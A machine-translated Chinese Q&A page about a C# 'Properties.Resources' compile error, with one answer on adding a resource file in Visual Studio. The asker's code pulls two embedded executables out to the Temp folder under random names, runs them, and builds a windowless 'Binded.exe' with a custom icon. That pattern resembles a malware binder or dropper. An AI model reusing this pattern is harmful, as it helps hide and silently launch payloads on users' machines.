C#无法访问Properties.Resources

时间:2017-11-07 10:50:31

标签: c#

所以,我正在制作一个文件夹。 saves1saves2是嵌入式资源和
我想在临时文件夹中提取它。

这是我的代码:

using System.IO;
using System.Diagnostics;

namespace _123
{
class Program
{
    static void Main(string[] args)
    {
        string patdth = @"C:\Users\Alfred\AppData\Local\Temp";
        byte[] lel1 = Properties.Resources.saves2;
        byte[] lel = Properties.Resources.saves1;
        File.WriteAllBytes(patdth + "\\hdhtehyr.exe", lel);
        File.WriteAllBytes(patdth + "\\hdhdhdhgd.exe", lel1);
        Process.Start(patdth + "\\hdhtehyr.exe");
        Process.Start(patdth + "\\hdhdhdhgd.exe");


    }
  }
}

我收到此错误:

  

"错误CS0103名称'属性'在当前不存在   上下文ConsoleApplication3"。

编辑:

我在这里动态插入资源,因为你可以看到我的代码" / resources" +路径"是我添加资源的方式。

        public void compile2(string file)
    {
        CodeDomProvider provider = CodeDomProvider.CreateProvider("CSharp");
        CompilerParameters compars = new CompilerParameters();
        compars.ReferencedAssemblies.Add("System.dll");
        compars.ReferencedAssemblies.Add("System.Reflection.dll");
        compars.ReferencedAssemblies.Add("System.IO.dll");
        compars.GenerateExecutable = true;
        compars.GenerateInMemory = false;
        compars.TreatWarningsAsErrors = false;
        compars.OutputAssembly = "Binded.exe";
        compars.CompilerOptions = "/resources:" + textBox10.Text;
        compars.CompilerOptions = "/resources:" + textBox11.Text;
        compars.CompilerOptions = "/t:winexe";
        if (string.IsNullOrWhiteSpace(textBox12.Text))
        {

        }
        else
        {
            compars.CompilerOptions = "/win32icon:" + textBox12.Text;
        }
        CompilerResults res = provider.CompileAssemblyFromSource(compars, file);
        {
            MessageBox.Show("Code compiled!", "Success");
        }
    }

1 个答案:

答案 0 :(得分:1)

在“ConsoleApplication3”项目下,双击“属性” - >选择“资源”标签 - >单击“此项目不包含默认资源文件。单击此处创建一个。”信息。在这里添加文件('saves1'和'saves2')。